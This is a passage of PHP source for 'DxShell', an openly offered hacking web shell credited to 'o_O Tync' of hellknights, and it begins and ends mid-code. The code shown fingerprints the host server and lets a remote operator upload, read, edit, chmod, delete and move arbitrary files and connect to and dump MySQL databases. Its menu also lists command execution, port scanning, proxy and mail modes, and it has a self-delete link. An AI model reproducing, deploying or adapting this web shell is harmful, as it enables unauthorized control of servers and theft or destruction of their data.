ONLY SET FOR MODES: */?> +<SCRIPT> +var dom = document.getElementById?1:0; +var ie4 = document.all && document.all.item; +var opera = window.opera; //Opera +var ie5 = dom && ie4 && !opera; +var nn4 = 
document.layers; +var nn6 = dom && !ie5 && !opera; +var vers=parseInt(navigator.appVersion); +var good_browser = (ie5 || ie4); +function showwin(hdr,txt,w,vis) +{ +if(good_browser) + { + var obj = document.all('js_floatwin'); + var evnt = event; + var xOffset = document.body.scrollLeft; + var yOffset = document.body.scrollTop; + + var temp = + "<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">" + +((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"") + +"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>" + +"</TABLE>"; + + if (vis == 1) + { + obj.innerHTML = temp; + obj.style.width = w; + hor = document.body.scrollWidth - obj.offsetWidth; + posHor = xOffset + evnt.clientX + 10; + posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5; + posVer = yOffset + evnt.clientY - obj.offsetHeight - 5; + + if (posHor<hor) + obj.style.posLeft = posHor + else + obj.style.posLeft = posHor2; + + obj.style.posTop = posVer; + + obj.style.visibility = "visible"; + } + else + { + obj.style.visibility = "hidden"; + obj.style.posTop = 0; + obj.style.posLeft = 0; + } + } +} +function movewin() +{ +if (good_browser) + { + var obj = document.all('js_floatwin'); + var evnt = event; + var xOffset = document.body.scrollLeft; + var yOffset = document.body.scrollTop; + + hor = document.body.scrollWidth - obj.offsetWidth; + posHor = xOffset + evnt.clientX + 10; + posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5; + posVer = yOffset + evnt.clientY - obj.offsetHeight - 5; + + if (posHor<hor) + obj.style.posLeft = posHor + else + obj.style.posLeft = posHor2; + + obj.style.posTop = posVer; + } +} +</SCRIPT> +<?php } /* /END */?> + +</head> +<body> +<?php +if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */ + { print str_repeat("\n", 10).'<!--SHIT KILLER-->'; + print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 
5).str_repeat('</script>', 2); + print "\n".'<TABLE WIDTH=100% BORDER=0 style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>'; + print "\n\n\n\n"; + } +?> + +<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div> +<table width=100% cellspacing=0 cellpadding=0 class=outset> +<tr> + <td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td> + <td> +<?php +print "\n".'<div style="margin-right:'.( ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30' ).'pt;">'; +print "\n".( ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':'' ); +print "\n".DxPrint_ParamState('php_ver', phpversion() ).' ; '; +print "\n".DxPrint_ParamState('php_Safe_Mode', $GLOB['PHP']['SafeMode'], '!' ).' ; '; +print "\n".DxPrint_ParamState('magic_quotes', (bool)get_magic_quotes_gpc(), '!' ).' ; '; +print "\n".DxPrint_ParamState('gZip', function_exists('gzencode') ).' ; '; +print "\n".DxPrint_ParamState('cURL', function_exists('curl_version') ).' ; '; +print "\n".DxPrint_ParamState('MySQL', function_exists('mysql_connect') ).' ; '; +print "\n".DxPrint_ParamState('MsSQL', function_exists('mssql_connect') ).' ; '; +print "\n".DxPrint_ParamState('PostgreSQL', function_exists('pg_connect') ).' ; '; +print "\n".DxPrint_ParamState('Oracle', function_exists('ocilogon') ).' 
; '; +print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>'); +print "\n".'</div>'; + +print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>'; +if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2) + print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>'; +print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>'; +print "\n".'</nobr></td></tr></table></span>'; + +print "\n\n".'<hr>'; +print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; '; +print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; '; +print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; '; +print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' 
/ '.getmyinode().'</b> ; </nobr>'; +print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; '; +print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE']; +?> + </td> +</table> +<table width=100% cellspacing=0 cellpadding=0 class=outset> +<tr> + <td width=100pt class=h2_oneline><h2>Modes</td> + <td style="text-align:center;"><nobr> + <a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a> + <td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr> + <a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a> + <td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr> + <a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a> + </td> + </tr> +</table> + +<?php $DX_Header_drawn=true; ?> + +<?php +################################################# +######## +######## DXGLOBALSHIT DOWNLOADER +######## +if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */ + { print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>'; + print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =(('; + print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download'; + + if 
($GLOB['SYS']['GZIP']['CanUse']) $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6); + + print "\n\n".'<br><br>'; + print "\n".'<textarea rows=30 style="width:90%" align=center>'; + print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)'; + print "\n".'// The file is '.( ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':'' ).' base64_encode()ed'; + print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';'; + print "\n\n\n\n"; + print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');'; + print "\n".'fputs($f, '.( ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)' ).');'; + print "\n".'fclose($f);'; + print "\n".'//Yahoo, hacker, the file is here =)'; + print "\n".'?>'; + print "\n".'</textarea>'; + die(); + } + +?> + +<table align=center> + <tr><td class=mode_header> + @MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?> + </td></tr></table> +<? + +######## +######## AboutBox +######## +if ($_GET['dxmode']=='WTF') + { + ?> +<table align=center class=nooooneblya><tr><td><div align=center> +<?php +print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>'; +print '<br>o_O Tync, ICQ# 244-648'; +?><br><br> +<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table> +<SCRIPT language=Javascript><!-- +var tl=new Array( +"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?", +"What's wrong with other shells?", +"Usability, functionality, bugs?... 
NO.", +"The main bug is: these shells ARE NOT mine =)", +"Just like to be responsible for every motherfucking byte of code.", +"Enjoy!", +"-----------------------------------", +"o_O Tync, http://hellknights.void.ru/, ICQ#244648", +"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>", +"", +"Greetz to: ", +"iNfantry the Ruler", +"Nik8 the Hekker", +"_1nf3ct0r_ the Father", +"Industry of Death the betatest0r =)", +"", +"Thanks to:", +"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music", +"", +"Wartime testers & debuggers ::: =))) :::", +"MINDGROW", +"", +"", +"Hekk da pl0net!", +"--- EOF ---" +); +var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row; +function type_text() +{contents='';row=Math.max(0,index-50); +while(row<index) contents += tl[row++] + '\r\n'; +document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|'; +if(text_pos++==str_length) + {text_pos=0;index++; + if(index!=tl.length) + {str_length=tl[index].length;setTimeout("type_text()",1000); + } + } else setTimeout("type_text()",speed); +}type_text(); +//--> +</SCRIPT> + <?php + } + + + ################################### + +######## +######## Upload file +######## +if ($_GET['dxmode']=='UPL') + { + if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted')); + + if (isset($_FILES['dx_uplfile']['tmp_name'])) + { + $GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']); + DxFiles_UploadHere($_POST['DxFTP_FileTO'], $_FILES['dx_uplfile']['name'], $GETFILE); + } + else + { + print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>'; + print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">'; + print "\n".'<font class="highlight_txt">Max: 
'.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>'; + print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>'; + print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>'; + print "\n".'<input type=submit value="Upload" class="submit"></form>'; + } + } + + ################################### + +######## +######## Directory listings +######## +if ($_GET['dxmode']=='DIR') + { + if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']); + $_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']); + if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/'; + + print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">'; + DxGETinForm('leave', 'dxmode'); + print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>'; + print "\n".'<input type=submit value="Goto" class="submit"></form>'; + + print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>'; + if (!file_exists($_GET['dxdir'])) die(DxError('No such directory')); + if (!is_dir($_GET['dxdir'])) die(DxError('It\'s a file!! What do you think about listing files in a file? =)) ')); + + if (isset($_GET['dxparam'])) + { if ($_GET['dxparam']=='mkDIR') if ( !mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3)) ) DxError('Unable to mkDir. Perms?'); + if ($_GET['dxparam']=='mkFILE') if ( !touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3)) ) DxError('Unable to mkFile. Perms?'); + } + + if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. 
Perms?...')); + $FILES=array('DIRS' => array(), 'FILES' => array()); + while (!is_bool( $file = readdir($dir_ptr) ) ) + if (($file!='.') and ($file!='..')) if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file; + asort($FILES['DIRS']);asort($FILES['FILES']); + + print "\n".'<span style="position:absolute;right:0pt;">'; + if (isset($_GET['dxdirsimple'])) print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>'; + else print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>'; + print '</span>'; + + $folderup_link=explode('/',$_GET['dxdir'].'../'); + if (!empty($folderup_link[ count($folderup_link)-3 ]) AND ($folderup_link[ count($folderup_link)-3 ]!='..')) + unset($folderup_link[ count($folderup_link)-3 ], $folderup_link[ count($folderup_link)-1 ]); + $folderup_link=implode('/', $folderup_link); + print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>' + .DxImg('foldup').' ../</a>'; + + print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>' + .'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>' + .' / ' + .'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>' + .' / '.str_repeat('&nbsp;',5) + .'<font class=highlight_txt>UPLOAD: </font>' + .'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>' + .' / ' + .'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>' + ; + + print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' 
files '; + print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">'; + for ($NOWi=0;$NOWi<=1;$NOWi++) + for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++) + { $cur=&$FILES[$NOW][$i]; + $dircur=$_GET['dxdir'].$cur; + print "\n".'<tr>'; + print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>' + .(($NOW=='DIRS')?DxImg('folder').' ' + . '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'') + .(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'') + .htmlspecialchars($cur).'</td>'; + + if (!isset($_GET['dxdirsimple'])) + { + print "\n\t".'<td class=linelisting>' + .'<span '.DxDesign_DrawBubbleBox('File Info', '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>' + .'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>' + .'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur)) + , 150).' class=Hover><b>INFO</span> </td>'; + print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>' + .((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' 
class=Hover>':'') + .'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>'; + } + + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>'; + + if (!isset($_GET['dxdirsimple'])) + { + if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>'; + if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>'; + print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>'; + print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>'; + } + print "\n\t".'</tr>'; + } + print "\n".'</table>'; + } + + +######## +######## File Global Actions +######## +if ('F_'==substr($_GET['dxmode'],0,2)) + { if 
(empty($_GET['dxfile'])) + { print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', ''); + print "\n".'<input type=text name="dxfile" value="" style="width:70%;">'; + print "\n".'<br><input type=submit value="Select" class="submit">'; + print "\n".'</form>'; + } + if (!file_exists(@$_GET['dxfile'])) die(DxError('No such file')); + print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>'; + } + +######## +######## File CHMOD +######## +if ($_GET['dxmode']=='F_CHM') + { + if (isset($_GET['dxparam'])) + { if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE) + print DxError('Chmod "'.$_GET['dxfile'].'" failed'); + else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>'; + } + else + { print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxfile'); + print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )'; + print "\n".'<br><input type=text name="dxparam" value="'. + //decoct(fileperms($_GET['dxfile'])) + substr(sprintf('%o', fileperms($_GET['dxfile'])), -4) + .'">'; + print "\n".'<input type=submit value="chmod" class="submit"></form>'; + } + } + +######## +######## File View +######## +if ($_GET['dxmode']=='F_VIEW') + { + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + if (!is_readable($_GET['dxfile'])) die(DxError('File is not readable. 
Perms?...')); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>'; + print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>'; + print "\n".'<td>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>' + .'</td>'; + print "\n".'</tr></table><br>'; + print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file'; + + print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n"; + print "\n".'<plaintext>'; + print file_get_contents($_GET['dxfile']); + die(); /* Plaintext is infinite */ + } + +######## +######## File Edit +######## +if ($_GET['dxmode']=='F_ED') + { + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + if (isset($_POST['dxparam'])) + { if (!is_writable($_GET['dxfile'])) die(DxError('File is not writable. Perms?...')); + if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed')); + if (fputs($f, $_POST['dxparam'])===FALSE) die(DxError('I/O: File write failed')); + fclose($f); + print 'File saved OK;'; + } + else + { + if (!is_readable($_GET['dxfile'])) die(DxError('File is not readable. 
Perms?...')); + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>'; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>'; + print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>'; + print "\n".'</form>'; + } + } + +######## +######## File Delete +######## +if ($_GET['dxmode']=='F_DEL') + { if (isset($_GET['dx_ok'])) + { if ($_GET['dx_ok']=='Yes') + { if ( (is_file($_GET['dxfile']) AND !unlink($_GET['dxfile'])) OR (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile'])) ) + print DxError('Unable to delete file. Perms?...<br>'); + else + { print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + } + else + { + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxfile'); + print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>' + ."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?' + ."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>' + ."\n".'</td></tr></table>'; + print "\n".'</form>'; + } + } + +######## +######## File Rename +######## +if ($_GET['dxmode']=='F_REN') + { + if (isset($_POST['dxparam'])) + { + if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam'])) + print DxError('Unable to rename. 
Perms?...<br>'); + else + { + print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + else + { + print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>'; + print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">'; + print "\n".'<input type=submit value="Rename" class="submit"></form>'; + } + } + +######## +######## File Copy +######## +if ($_GET['dxmode']=='F_COP') + { + if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))')); + + $newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3); + if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */ + $newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos); + print $newname; + if (!copy($_GET['dxfile'], $newname)) + print DxError('Unable to copy. Perms?...<br>'); + else + { + print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + +######## +######## File Move +######## +if ($_GET['dxmode']=='F_MOV') + { + if (isset($_POST['dxparam'])) + { + if (!rename($_GET['dxfile'], $_POST['dxparam'])) + print DxError('Unable to rename. Perms? 
Or no path?...<br>'); + else + { + print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam']))); + } + } + else + { + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); + print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>'; + print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">'; + print "\n".'<input type=submit value="M0ve" class="submit"></form>'; + } + } + +if (substr($_GET['dxmode'],0,2)=='F_') + {/* file actions */ + print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>'; + } + + ################################### + +######## +######## SQL Maintenance +######## +if ($_GET['dxmode']=='SQL') + { if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'])) + { print "\n".'<h2>MySQL connection</h2>'; + print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>'; + DxGETinForm('leave', 'dxmode'); + print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">'; + print "\n".'<br>Login:<input type=text name="dxsql_l" value="" style="width:200pt">'; + print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" style="width:200pt">'; + print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>'; + die(); + } + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' 
- '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + $mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()")); + print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true); + for ($i=0;$i<count($DATABASES);$i++) + $DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false)); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0>' + .'<tr><td class=h2_oneline><h1>DB:</h1></td>'; + if (!isset($_GET['dxsql_d'])) + { + print "\n".'<td class=h2_oneline style="border-width:0pt;">'; + print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p'); + print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">'; + print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>'; + for ($i=0;$i<count($DATABASES);$i++) + print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">' + .'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0] + .'</OPTION>'; + print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>'; + print "\n".'</tr></table>'; + die(); + } + else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>' + .'</tr></table>'; + + if (!empty($_GET['dxsql_d'])) + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' 
